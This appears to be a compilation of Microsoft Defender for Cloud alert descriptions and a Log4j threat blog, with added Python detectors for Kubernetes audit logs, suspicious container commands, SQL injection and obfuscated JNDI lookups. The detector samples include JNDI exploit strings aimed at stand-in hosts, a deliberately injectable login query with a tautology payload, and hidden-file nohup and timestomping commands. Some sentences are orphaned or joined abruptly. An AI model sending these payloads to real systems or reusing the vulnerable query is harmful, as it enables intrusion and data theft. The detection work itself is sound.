The volume that was detected is a hostPath type, which mounts a sensitive file or folder from the node into the container. If the container is compromised, the attacker can use this mount to gain access to the node.

Kubernetes audit log analysis detected a modification of the CoreDNS configuration. The configuration of CoreDNS can be modified by overriding its ConfigMap; whoever controls that ConfigMap controls name resolution for the whole cluster.

Kubernetes audit log analysis detected a new admission webhook configuration. The behavior of these admission controllers is determined by an admission webhook that the user deploys to the cluster. The usage of such admission controllers can be legitimate; however, attackers can use such webhooks to modify requests (in the case of a MutatingAdmissionWebhook) or to inspect requests and gain sensitive information (in the case of a ValidatingAdmissionWebhook).
Detected file download from a known malicious source (K8S). Analysis of processes running within a container detected the download of a file from a source frequently used to distribute malware.

Analysis of processes running within a container detected the installation of a startup script for single-user mode. It is extremely rare that any legitimate process needs to execute in that mode, so it may indicate that an attacker has added a malicious process to every run level to guarantee persistence.

Detected suspicious file download (K8S).

Detected suspicious use of the nohup command (K8S). Analysis of processes running within a container detected suspicious use of the nohup command. Attackers have been seen using nohup to run hidden files from a temporary directory so that their executables keep running in the background after the launching session ends. It is rare to see this command run on hidden files located in a temporary directory.

Detected suspicious use of the useradd command (K8S). Analysis of processes running within a container detected suspicious use of the useradd command.

Kubernetes audit log analysis detected a container that has an image associated with a digital currency mining tool.

Digital currency mining related behavior detected (K8S). Analysis of host data detected the execution of a process or command normally associated with digital currency mining.

Docker build operation detected on a Kubernetes node (K8S). Analysis of processes running within a container indicates a build operation of a container image on a Kubernetes node.
Analysis of the Kubernetes audit logs detected an excessive-permissions role assignment to your cluster. The listed permissions for the assigned roles are uncommon for the specific service account. This detection considers previous role assignments to the same service account across clusters monitored by Azure, volume per permission, and the impact of the specific permission. The anomaly detection model used for this alert takes into account how this permission is used across all clusters monitored by Microsoft Defender for Cloud.

Executable found running from a suspicious location (K8S). Analysis of host data detected an executable file running from a location associated with known suspicious files.

The Kubernetes audit log analysis detected exposure of the Istio Ingress by a load balancer in a cluster that runs Kubeflow. This action might expose the Kubeflow dashboard to the internet. If the dashboard is exposed to the internet, attackers can access it and run malicious containers or code on the cluster.

Kubernetes audit log analysis detected exposure of the Kubernetes Dashboard by a LoadBalancer service. An exposed dashboard allows unauthenticated access to cluster management and poses a security threat.

The Kubernetes audit log analysis detected exposure of a service by a load balancer. This service is related to a sensitive application that allows high-impact operations in the cluster, such as running processes on the node or creating new containers. In some cases, this service doesn't require authentication. If the service doesn't require authentication, exposing it to the internet poses a security risk.

The Kubernetes audit log analysis detected exposure of a Redis service by a load balancer.

Analysis of processes running within a container detected file names that are part of a toolkit associated with malware capable of launching DDoS attacks, opening ports and services, and taking full control of the infected system.
While this behavior can be legitimate, it's often seen in malicious activities, when attackers try to hide their source IP.

Defender for Cloud detected that some Kubernetes events have been deleted. Kubernetes events are objects in Kubernetes that contain information about changes in the cluster. Attackers might delete those events to hide their operations in the cluster.

Kubernetes audit log analysis detected usage of a Kubernetes penetration testing tool in the AKS cluster. While this behavior can be legitimate, attackers might use such public tools for malicious purposes.

Analysis of processes running within a container detected the execution of a command normally associated with common Linux bot reconnaissance.

Manipulation of host firewall detected (K8S). Analysis of processes running within a container detected possible manipulation of the on-host firewall.

Microsoft Defender for Cloud test alert, not a threat (K8S).

Analysis of processes running within a container indicates that a suspicious process was running. This is often associated with the MITRE 54ndc47 agent (the default agent of the MITRE Caldera adversary-emulation framework), which could be used maliciously to attack other machines.

The kube-system namespace should not contain user resources. Attackers can use this namespace to hide malicious components.

Kubernetes audit log analysis detected a new role with high privileges. Unnecessary privileges might cause privilege escalation in the cluster.

Analysis of processes running within a container indicates that a suspicious tool ran. This tool is often associated with malicious users attacking others.

Analysis of processes running within a container detected a suspicious file being downloaded and run.
Possible command line exploitation attempt (K8S). Analysis of processes running within a container detected a possible exploitation attempt against a known vulnerability.

Possible credential access tool detected (K8S). Analysis of processes running within a container indicates that a possible known credential access tool was running on the container, as identified by the specified process and command-line history item.

Possible Cryptocoinminer download detected (K8S). Analysis of processes running within a container detected the download of a file normally associated with digital currency mining.

Possible data exfiltration detected (K8S). Analysis of processes running within a container detected possible removal of files that track the user's activity during the course of its operation.

Possible password change using crypt-method detected (K8S). Analysis of processes running within a container detected a password change using the crypt method. Attackers can make this change to continue access and gain persistence after compromise.

Potential overriding of common files (K8S). Analysis of processes running within a container detected overriding of common files; attackers do this to obfuscate their actions or to gain persistence.

Analysis of processes running within a container detected the initiation of port forwarding to an external IP address.

Analysis of processes running within a container detected a potential reverse shell.

Kubernetes audit log analysis detected a new privileged container. If compromised, an attacker can use the privileged container to gain access to the node.

Process associated with digital currency mining detected (K8S). Analysis of processes running within a container detected the execution of a process normally associated with digital currency mining.

This access could signify that an actor is attempting to gain persistent access to a machine.

Kubernetes audit log analysis detected a new binding to the cluster-admin role, which gives administrator privileges. Unnecessary administrator privileges might cause privilege escalation in the cluster.

Script extension mismatch detected (K8S). Analysis of processes running within a container detected a mismatch between the script interpreter and the extension of the script file provided as input.
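Several of the alerts above (sensitive hostPath volume, CoreDNS ConfigMap modification, new admission webhook, new privileged container, new cluster-admin binding) are all "Kubernetes audit log analysis" detections. The following is an added example, not code from the page or from Microsoft, of what that analysis looks like over audit events in the audit.k8s.io/v1 JSON-lines layout. The sample events are constructed, and the sensitive-path list, the "only successful writes count" rule and the message texts are this example's assumptions rather than Defender for Cloud's actual logic.

```python
"""Heuristic review of a Kubernetes audit log (JSON lines, audit.k8s.io/v1 shape)
for the control-plane alerts described on this page. Added example: sample events
are constructed; SENSITIVE_HOST_PATHS and the success-only rule are assumptions."""
import json

# Node paths whose mount hands a container a route to node compromise (assumption).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/var/lib/kubelet",
                        "/var/run/docker.sock", "/run/containerd", "/var/run/crio")
WRITE_VERBS = {"create", "update", "patch"}


def _is_sensitive_host_path(path):
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    for p in SENSITIVE_HOST_PATHS:
        p = p.rstrip("/")
        if p and (norm == p or norm.startswith(p + "/")):
            return True
    return False


def check_pod(ev):
    spec = (ev.get("requestObject") or {}).get("spec", {})
    findings = []
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if (c.get("securityContext") or {}).get("privileged") is True:
            findings.append(f"privileged container {c.get('name')}")
    for v in spec.get("volumes", []):
        hp = v.get("hostPath")
        if hp and _is_sensitive_host_path(hp.get("path", "")):
            findings.append(f"sensitive hostPath {hp['path']} via volume {v.get('name')}")
    return findings


def check_binding(ev):
    obj = ev.get("requestObject") or {}
    if obj.get("roleRef", {}).get("name") != "cluster-admin":
        return []
    who = ", ".join(f"{s.get('kind')}/{s.get('name')}" for s in obj.get("subjects", []))
    return [f"new binding to cluster-admin for {who}"]


def check_configmap(ev):
    ref = ev.get("objectRef", {})
    if ref.get("namespace") == "kube-system" and ref.get("name") == "coredns":
        return ["CoreDNS ConfigMap modified"]
    return []


def check_webhook(ev):
    ref = ev.get("objectRef", {})
    return [f"new {ref.get('resource')} {ref.get('name')}"]


HANDLERS = {"pods": check_pod, "clusterrolebindings": check_binding,
            "rolebindings": check_binding, "configmaps": check_configmap,
            "mutatingwebhookconfigurations": check_webhook,
            "validatingwebhookconfigurations": check_webhook}


def analyze_audit_log(lines):
    """Return (username, finding) pairs for suspicious, successful write requests."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        # Only completed writes count: a denied (4xx) request changed nothing.
        if ev.get("verb") not in WRITE_VERBS or ev.get("stage") != "ResponseComplete":
            continue
        if ev.get("responseStatus", {}).get("code", 0) >= 400:
            continue
        handler = HANDLERS.get(ev.get("objectRef", {}).get("resource"))
        for finding in (handler(ev) if handler else []):
            alerts.append((ev.get("user", {}).get("username", "?"), finding))
    return alerts


def _event(verb, resource, name, code=201, user="dev-ci", ns=None, body=None):
    """Build one constructed audit event in the audit.k8s.io/v1 layout."""
    return json.dumps({"stage": "ResponseComplete", "verb": verb, "user": {"username": user},
                       "objectRef": {"resource": resource, "name": name, "namespace": ns},
                       "responseStatus": {"code": code}, "requestObject": body})


SAMPLE_AUDIT_LOG = [  # constructed sample, not real cluster data
    _event("create", "pods", "debug", ns="default", body={"spec": {
        "containers": [{"name": "shell", "image": "busybox",
                        "securityContext": {"privileged": True}}],
        "volumes": [{"name": "host", "hostPath": {"path": "/"}}]}}),
    _event("create", "clusterrolebindings", "oops", body={
        "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
        "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "default"}]}),
    _event("patch", "configmaps", "coredns", code=200, ns="kube-system"),
    _event("create", "mutatingwebhookconfigurations", "sidecar-injector"),
    # Benign: an ordinary pod, and a cluster-admin binding the API server denied.
    _event("create", "pods", "web", ns="default", user="app",
           body={"spec": {"containers": [{"name": "web", "image": "nginx"}]}}),
    _event("create", "clusterrolebindings", "denied", code=403, user="intern",
           body={"roleRef": {"kind": "ClusterRole", "name": "cluster-admin"}, "subjects": []}),
]

if __name__ == "__main__":
    for user, finding in analyze_audit_log(SAMPLE_AUDIT_LOG):
        print(f"{user}: {finding}")
```

Running it reports five findings, all attributed to the dev-ci principal; the ordinary nginx pod and the 403-denied binding attempt produce nothing, which is the point of keying on ResponseComplete with a 2xx status: an audit line for a request the API server refused is noise for these alerts, though it can still feed a separate "attempted privilege escalation" signal.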
Security-related process termination detected (K8S). Analysis of processes running within a container detected an attempt to terminate processes related to security monitoring on the container. Attackers will often try to terminate such processes using predefined scripts post-compromise.

Analysis of processes running within a container detected an SSH server running inside the container.

Analysis of processes running within a container detected suspicious compilation. Attackers will often compile exploits to escalate privileges.

Suspicious file timestamp modification (K8S). Attackers will often copy timestamps from existing legitimate files to new tools to avoid detection of these newly dropped files.

Analysis of processes running within a container indicates that a suspicious request was made to the Kubernetes API. The request was sent from a container in the cluster. Although this behavior can be intentional, it might indicate that a compromised container is running in the cluster.
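The "analysis of processes running within a container" alerts are command-line heuristics. The following added example (not the page's or the vendor's code) shows three of them over constructed process records: nohup on a hidden file in a temporary directory, a script interpreter given a file whose extension belongs to another language (the script extension mismatch alert above), and timestamp copying with touch -r (the file timestamp modification alert). The interpreter-to-extension map, the temp-directory list and the message texts are this example's assumptions.

```python
"""Command-line heuristics for three container process alerts: nohup on a hidden
temp file, interpreter/extension mismatch, and timestomping with touch -r.
Added example over constructed records; the tables below are assumptions."""
import os
import shlex

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
# Interpreter -> extensions that are expected for it (assumption; extend as needed).
INTERPRETER_EXTS = {"sh": {".sh"}, "bash": {".sh", ".bash"}, "dash": {".sh"},
                    "python": {".py"}, "perl": {".pl"}, "php": {".php"},
                    "ruby": {".rb"}, "node": {".js", ".mjs"}}


def _interpreter(argv0):
    """python3.11 -> python, perl5 -> perl: strip version suffixes from the basename."""
    name = os.path.basename(argv0)
    while name and name[-1] in "0123456789.":
        name = name[:-1]
    return name


def check_nohup(argv):
    if os.path.basename(argv[0]) != "nohup" or len(argv) < 2:
        return None
    target = argv[1]
    in_tmp = any(target.startswith(d + "/") for d in TEMP_DIRS)
    if in_tmp and os.path.basename(target).startswith("."):
        return f"nohup on hidden file {target} in a temp directory"
    return None


def check_script_mismatch(argv):
    interp = _interpreter(argv[0])
    # -c/-e pass code inline and -m names a module: there is no script file to judge.
    if interp not in INTERPRETER_EXTS or any(a in ("-c", "-e", "-m") for a in argv[1:]):
        return None
    for a in argv[1:]:
        if a.startswith("-"):
            continue
        ext = os.path.splitext(a)[1].lower()
        if ext and ext not in INTERPRETER_EXTS[interp]:
            return f"{interp} run against {a}: {ext} is not a {interp} script extension"
        return None  # the first positional argument is the script; stop here
    return None


def check_timestomp(argv):
    if os.path.basename(argv[0]) != "touch":
        return None
    for i, a in enumerate(argv[1:], 1):
        if a == "-r" and i + 1 < len(argv):
            return f"touch copied timestamps from {argv[i + 1]}"
        if a.startswith("--reference="):
            return f"touch copied timestamps from {a.split('=', 1)[1]}"
    return None


CHECKS = (check_nohup, check_script_mismatch, check_timestomp)


def analyze_processes(records):
    """records: (container, command line) pairs. Returns (container, cmdline, reason)."""
    hits = []
    for container, cmdline in records:
        try:
            argv = shlex.split(cmdline)
        except ValueError:  # unbalanced quotes: not parseable, skip
            continue
        for check in (CHECKS if argv else ()):
            reason = check(argv)
            if reason:
                hits.append((container, cmdline, reason))
    return hits


SAMPLE_PROCESSES = [  # constructed: pod name, command line as seen by the sensor
    ("web-7f9c", "nohup /tmp/.x/.kthreadd &"),
    ("web-7f9c", "bash /var/tmp/logo.jpg"),
    ("web-7f9c", "python3 /tmp/update.sh"),
    ("web-7f9c", "touch -r /bin/ls /tmp/.x/.kthreadd"),
    ("api-1a2b", "nohup python3 /app/worker.py"),      # background job, not hidden
    ("api-1a2b", "bash /app/entrypoint.sh"),
    ("api-1a2b", "python3 -c 'import app; app.run()'"),
    ("api-1a2b", "touch /tmp/healthy"),
]

if __name__ == "__main__":
    for container, cmdline, reason in analyze_processes(SAMPLE_PROCESSES):
        print(f"{container}: {reason}  [{cmdline}]")
```

The four web-7f9c lines trip one check each; the api-1a2b lines, which are ordinary container start-up commands, trip none. Note that each heuristic alone is weak (developers do run bash on oddly named files), which is why the alert text above stresses the combination: a hidden file, in a temp directory, launched with nohup, after its timestamps were copied from a system binary.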
Analysis of processes running within a container indicates that a suspicious request was made to the Kubernetes Dashboard.

An application has generated a faulty SQL statement in the database. This can indicate a possible vulnerability to SQL injection attacks. There are two possible reasons for a faulty statement: a defect in application code might have constructed the faulty SQL statement, or application code or stored procedures didn't sanitize user input when constructing the statement, in which case the same code path can be exploited for SQL injection.
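Why a database syntax error is treated as an injection signal is easiest to see with both code paths side by side. This is an added example, not from the page: a login lookup built by string concatenation breaks on a single quote (the "faulty statement" the alert keys on) and can be steered by a tautology, while the parameterized form treats the same input as data. It runs against an in-memory SQLite database with constructed rows; the table layout and the helper names are this example's own.

```python
"""A 'faulty SQL statement' as a SQL-injection signal: concatenated vs parameterized
queries on an in-memory SQLite database. Added example with constructed data."""
import sqlite3


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])  # constructed rows
    return con


def login_vulnerable(con, name, pw):
    # Deliberately unsafe: untrusted input becomes part of the statement text.
    sql = f"SELECT name FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return [row[0] for row in con.execute(sql)]


def login_safe(con, name, pw):
    # Parameterized: the driver sends the values separately from the statement.
    sql = "SELECT name FROM users WHERE name = ? AND pw = ?"
    return [row[0] for row in con.execute(sql, (name, pw))]


def probe(login, name, pw):
    """Return ('ok', matched names) or ('faulty', error text) for one login attempt."""
    con = _db()
    try:
        return ("ok", login(con, name, pw))
    except sqlite3.OperationalError as exc:  # the database rejected the statement
        return ("faulty", str(exc))
    finally:
        con.close()


if __name__ == "__main__":
    attempts = [("alice", "s3cret"),          # legitimate login
                ("o'brien", "x"),             # an apostrophe in a real name
                ("alice", "' OR '1'='1")]     # classic tautology payload
    for name, pw in attempts:
        print(f"{name!r:10} vulnerable={probe(login_vulnerable, name, pw)}")
        print(f"{'':10} safe      ={probe(login_safe, name, pw)}")
```

The apostrophe case is the one the alert is about: the vulnerable path produces a statement the database cannot parse, and a burst of such errors in the server's logs is exactly what an attacker probing for injection generates before finding a payload that parses, like the tautology, which the vulnerable path then happily executes against every row. The parameterized path returns an empty result for both inputs and never produces a faulty statement.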
Attempted logon by a potentially harmful application (SQL).

There has been a change in the access pattern to an SQL Server, where someone has signed in to the server from an unusual Azure data center. In some cases, the alert detects a legitimate action (a new application or Azure service). In other cases, the alert detects a malicious action (an attacker operating from a breached resource in Azure).

Log on from an unusual location (SQL). There has been a change in the access pattern to SQL Server, where someone has signed in to the server from an unusual geographical location. In some cases, the alert detects a legitimate action (a new application or developer maintenance). In other cases, the alert detects a malicious action (a former employee or an external attacker).

Login from a principal user not seen in 60 days (SQL). A principal user not seen in the last 60 days has logged into your database.
If this database is new or this is expected behavior caused by recent changes in the users accessing the database, Defender for Cloud will identify significant changes to the access patterns and attempt to prevent future false positives. Your resource has been accessed successfully from an IP address that Microsoft Threat Intelligence has associated with suspicious activity.
An abnormally high number of failed sign-in attempts with different credentials has occurred. In some cases, the alert detects penetration testing in action. In other cases, the alert detects a brute force attack.

An active exploit has occurred against an identified application vulnerable to SQL injection. This means an attacker is trying to inject malicious SQL statements by using the vulnerable application code or stored procedures.

A potential brute force attack has been detected on your resource. The attacker is using the valid user 'sa', which has permission to log in.

Suspected successful brute force attack (SQL).

Suspected brute force attack using a valid user (SQL). The attacker is using a valid user (the username is given in the alert), which has permission to log in.

Login from a domain not seen in 60 days (SQL). A user has logged in to your resource from a domain no other users have connected from in the last 60 days. If this resource is new or this is expected behavior caused by recent changes in the users accessing the resource, Defender for Cloud will identify significant changes to the access patterns and attempt to prevent future false positives.
Logon from an unusual cloud provider (SQL). Someone logged on to your resource from a cloud provider not seen in the last 60 days. It's quick and easy for threat actors to obtain disposable compute power for use in their campaigns. If this is expected behavior caused by the recent adoption of a new cloud provider, Defender for Cloud will learn over time and attempt to prevent future false positives.

Microsoft Defender for Resource Manager detected an operation from an IP address that has been marked as suspicious in threat intelligence feeds.

Microsoft Defender for Resource Manager detected a resource management operation from an IP address that is associated with proxy services, such as Tor. While this behavior can be legitimate, it's often seen in malicious activities, when threat actors try to hide their source IP.

MicroBurst's Information Gathering module was run on your subscription.
This tool can be used to discover resources, permissions and network structures. This was detected by analyzing the Azure Activity logs and resource management operations in your subscription.
MicroBurst's exploitation toolkit was used to execute code on your virtual machines. MicroBurst's exploitation toolkit was used to extract keys from your Azure key vaults. This was detected by analyzing Azure Activity logs and resource management operations in your subscription.
MicroBurst's exploitation toolkit was used to extract keys to your storage accounts. MicroBurst's exploitation toolkit was used to extract secrets from your Azure key vaults. This operation might have been performed by a legitimate user in your organization.
Alternatively, it might indicate that an account in your organization was breached, and that the threat actor is trying to grant permissions to an additional user account they own. This was detected by analyzing Azure Resource Manager operations in your tenant.
PowerZure exploitation toolkit was used to enumerate resources on behalf of a legitimate user account in your organization. PowerZure exploitation toolkit was used to enumerate storage shares, tables, and containers. PowerZure exploitation toolkit was used to execute a Runbook. PowerZure exploitation toolkit was used to extract Runbook content.
User activity from an IP address identified as an anonymous proxy has been detected. These proxies are used by people who want to hide their device's IP address, and can be used for malicious intent. This detection uses a machine learning algorithm that reduces false positives, such as mis-tagged IP addresses that are widely used by users in the organization. Requires an active Microsoft Defender for Cloud Apps license.

Activity from a location that wasn't recently or ever visited by any user in the organization has occurred. This detection considers past activity locations to determine new and infrequent locations.
The anomaly detection engine stores information about previous locations used by users in the organization. A known cloud-environment reconnaissance toolkit run has been detected in your environment. The tool Azurite can be used by an attacker or penetration tester to map your subscriptions' resources and identify insecure configurations. Two user activities in a single or multiple sessions have occurred, originating from geographically distant locations.
This occurs within a time period shorter than the time it would have taken the user to travel from the first location to the second. This indicates that a different user is using the same credentials. This detection uses a machine learning algorithm that ignores obvious false positives contributing to the impossible travel conditions, such as VPNs and locations regularly used by other users in the organization.
The detection has an initial learning period of seven days, during which it learns a new user's activity pattern. Subscription activity logs analysis has detected suspicious behavior. A principal not in use for a long period of time is now performing actions that can secure persistence for an attacker.
A principal that doesn't regularly use PowerShell to manage the subscription environment is now using PowerShell, and performing actions that can secure persistence for an attacker.

Analysis of your subscription activity logs has detected suspicious behavior. A principal that doesn't regularly use the Azure portal (Ibiza) to manage the subscription environment (it hasn't used the Azure portal to manage this subscription, or a subscription that it is actively managing, for the last 45 days) is now using the Azure portal and performing actions that can secure persistence for an attacker.
Microsoft Defender for Resource Manager detected a suspicious creation of privileged custom role definition in your subscription. Alternatively, it might indicate that an account in your organization was breached, and that the threat actor is trying to create a privileged role to use in the future to evade detection.
Usage of the MicroBurst exploitation toolkit to run arbitrary code or exfiltrate Azure Automation account credentials. Usage of the NetSPI persistence technique to create a webhook backdoor and maintain persistence in your Azure environment. PowerZure exploitation toolkit detected attempting to run code or exfiltrate Azure Automation account credentials.
PowerZure exploitation toolkit detected creating a webhook backdoor to maintain persistence in your Azure environment. Such traffic, while possibly benign, may indicate abuse of this common protocol to bypass network traffic filtering. Such activity, while possibly legitimate user behavior, is frequently employed by attackers to evade tracking and fingerprinting of network communications. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
Such activity, while possibly benign, is frequently performed by attackers to harvest credentials to remote services. Typical related attacker activity is likely to include the exploitation of any credentials on the legitimate service.
Such activity, while possibly benign, is frequently performed by attackers to evade network monitoring and filtering. Such activity, while possibly legitimate user behavior, is frequently performed by attackers following compromise of resources.
Typical related attacker activity is likely to include the download and execution of common mining tools. Such activity, while possibly legitimate user behavior, is frequently performed by attackers to evade network monitoring and filtering.
Access from a suspicious IP address (Storage). Indicates that this storage account has been successfully accessed from an IP address that is considered suspicious. This alert is powered by Microsoft Threat Intelligence.

This URL was part of a phishing attack affecting Microsoft users. Typically, content hosted on such pages is designed to trick visitors into entering their corporate credentials or financial information into a web form that looks legitimate.

Antimalware alerts indicate that one or more infected files are stored in an Azure file share that is mounted to multiple VMs. If attackers gain access to a VM with a mounted Azure file share, they can use it to spread malware to other VMs that mount the same share. Applies to: Azure Files.

The access policy of a container in your storage account was modified to allow anonymous access. This might lead to a data breach if the container holds any sensitive data. This alert is based on analysis of the Azure activity log.

Authenticated access from a Tor exit node (Storage). Threat actors use Tor to make it difficult to trace the activity back to them. Authenticated access from a Tor exit node is a likely indication that a threat actor is trying to hide their identity.

Access from an unusual location to a storage account (Storage). Indicates that there was a change in the access pattern to an Azure Storage account. Someone has accessed this account from an IP address considered unfamiliar when compared with recent activity. Either an attacker has gained access to the account, or a legitimate user has connected from a new or unusual geographic location. An example of the latter is remote maintenance from a new application or developer.

Unusual unauthenticated access to a storage container (Storage). This storage account was accessed without authentication, which is a change in the common access pattern. Read access to this container is usually authenticated. This might indicate that a threat actor was able to exploit public read access to one or more storage containers in this storage account. Applies to: Azure Blob Storage.

January 10, recap — The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment.
Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries like nation-state actors and commodity attackers alike have been observed taking advantage of these vulnerabilities.
There is high potential for the expanded use of the vulnerabilities. In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware. We have observed many existing attackers adding exploits of these vulnerabilities to their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends that customers do additional review of devices where vulnerable installations are discovered.
At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance.
January 11, update — We have just released new threat and vulnerability management capabilities, including providing the ability to turn off JNDI lookup directly on the Microsoft Defender portal. With nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible.
Refer to the Microsoft Security Response Center blog for technical information about the vulnerabilities and mitigation recommendations. Meanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats.
This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks. The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers.

An example pattern of attack appears in a web request log as a crafted lookup string in a logged request field. An attacker performs an HTTP request against a target system, which generates a log entry using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.

The specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. As security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. The vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives.
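The obfuscation mentioned above is why a literal match on the lookup string is not enough. The following added example (not Microsoft's detection logic, and not from this page) scans web request log lines for a Log4j 2 JNDI lookup after normalising the text the way the library's own substitution would: URL-decoding, then folding nested ${lower:}, ${upper:} and the ':-' default operator to a fixed point. The log lines are constructed, and the set of folded lookups covers the common evasions only, not every Log4j 2 lookup type.

```python
"""Detect Log4j 2 JNDI lookup strings in request logs after folding common
obfuscations. Added example with constructed log lines; the normalisation below
handles URL encoding, ${lower:}, ${upper:} and ':-' defaults only."""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: no further braces inside it.
_INNER = re.compile(r"\$\{([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]*)", re.IGNORECASE)


def _fold(match):
    """Evaluate one inner lookup the way Log4j 2's substitution would."""
    body = match.group(1)
    if ":-" in body:                      # ${anything:-value} -> value
        return body.split(":-", 1)[1]
    kind, _, value = body.partition(":")
    if kind.lower() == "lower":
        return value.lower()
    if kind.lower() == "upper":
        return value.upper()
    return match.group(0)                 # unknown lookup: leave it in place


def normalize(text, max_rounds=10):
    """Undo URL encoding (up to two layers) and fold nested lookups to a fixed point."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        folded = _INNER.sub(_fold, text)
        if folded == text:
            break
        text = folded
    return text


def find_jndi(line):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ...) if the line carries a lookup, else None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    return m.group(1).lower() or "unknown"


def scan(lines):
    """(line index, scheme) for every line that carries a lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


SAMPLE_LOG = [  # constructed combined-format lines; addresses are documentation ranges
    '203.0.113.5 - - [10/Dec/2021:12:00:00 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${${lower:j}${lower:n}${lower:d}i:'
    '${lower:r}mi://198.51.100.7/o} HTTP/1.1" 200 0 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET /%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A'
    '%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET /docs?q=${env:HOME} HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, scheme in scan(SAMPLE_LOG):
        print(f"line {i}: jndi lookup via {scheme}")
```

The first three constructed lines are flagged (ldap, rmi and dns respectively, the last after URL decoding and folding ${::-j}); the plain request and the ${env:HOME} lookup, which is not a JNDI lookup, are not. The dns scheme matters because, as the text above notes, much of the observed scanning used DNS callbacks with no payload at all, so a detector that only looks for ldap:// misses the fingerprinting phase.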
Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.
Minecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. Microsoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by Bitdefender.
In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.
In these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of javaw.
These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use. Due to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.
In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. MSTIC and the Microsoft Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks.
These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.
The vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload.
This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.
Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally. This activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE to existing campaigns that were exploiting vulnerabilities to drop remote access tools.
In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns. The Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities.
